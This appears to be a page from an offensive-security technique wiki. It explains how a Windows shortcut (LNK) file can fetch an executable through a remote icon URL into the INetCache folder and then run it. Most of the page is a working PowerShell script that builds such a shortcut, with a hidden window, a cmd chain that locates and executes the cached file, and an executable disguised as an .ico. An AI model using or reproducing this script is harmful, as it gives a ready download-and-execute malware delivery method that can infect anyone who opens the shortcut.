Using LNK to Automatically Download Payloads

LNK can handle externally loaded icons. Specifically, it can load .ico files specified in a UNC link or even paths that are specified as urls. In short, if you supply a remote and external icon file, it will fetch and download the icon file for it to be displayed.

When the file is fetched by the LNK file, it will be stored in the path %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache\file.exe

The LNK can then execute the file in this directory.

An example script for generating the file is shown below:

$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\file.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B file*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/file.exe?.ico";
$shortcut.Save();

PreviousLNK NextHTA

Last updated 1 year ago